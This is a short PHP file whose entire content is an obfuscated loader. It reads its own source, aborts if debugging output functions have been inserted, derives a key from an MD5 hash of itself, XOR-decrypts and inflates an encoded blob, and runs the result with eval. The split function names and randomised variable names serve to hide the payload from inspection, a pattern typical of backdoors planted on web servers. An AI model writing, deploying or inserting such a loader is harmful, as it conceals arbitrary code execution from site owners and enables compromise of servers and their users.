<?php
$ocboxaexkob="88e10a775bf2946fd47bdea36b6e09b1";
$fcymqnmv="0c5b575204550600055a00020c0c015e00055552515459550152520704080009";
$qpuukir="WexjDfZ0PXOfWssSJAblJOQdfhVHLHtQQkf13xTElE1wy7aLo5HArMGAx6sf3w1yRSXkOJpzg1l3sxMutq6go1ztjwofTQv1AJ1dlBw+9kTd0OcLVlCSIwwa3QD+nWMemLtf9I5zcTvzEaRsiv2ZdG20BGRequ9YTI/Vu8srDjkiFFmhVhG+q5l0uo4CZ8oDC+gZfSqjynEfe2g0S01fC+NjgZENMgPcr3fq/xIGazUKBbBEmFFyVxvPFelXcp34utw=";
$rqaipzqg=file_get_contents(__FILE__);
$sotiqb=str_replace($qpuukir,"",$rqaipzqg);
if(strpos($sotiqb,"ec"."ho")!==false||strpos($sotiqb,"pr"."int")!==false||strpos($sotiqb,"var_"."dump")!==false||strpos($sotiqb,"file_put_"."contents")!==false||strpos($sotiqb,"fw"."rite")!==false){die();}
$wjzataipd=str_replace(array($ocboxaexkob,$fcymqnmv),array("SP_1d08fd50","KP_a0669fad"),$rqaipzqg);
$uksinqrh=md5($wjzataipd);
$evpzghvav=hex2bin($fcymqnmv);
$wbvfuavnagk="";
$kivuzau=strlen($uksinqrh);
for($qxycwbrillvp=0;$qxycwbrillvp<$kivuzau;$qxycwbrillvp++){
    $wbvfuavnagk.=chr(ord($evpzghvav[$qxycwbrillvp])^ord($uksinqrh[$qxycwbrillvp]));
}
$bsansh=base64_decode($qpuukir);
$rvoddqffk=strlen($bsansh);
$wgnlehdz="";
$mdtkbnwhc=strlen($wbvfuavnagk);
for($qxycwbrillvp=0;$qxycwbrillvp<$rvoddqffk;$qxycwbrillvp++){
    $wgnlehdz.=$bsansh[$qxycwbrillvp]^$wbvfuavnagk[$qxycwbrillvp%$mdtkbnwhc];
}
$ivluwbuip="gz"."in"."fl"."ate";
eval($ivluwbuip($wgnlehdz));
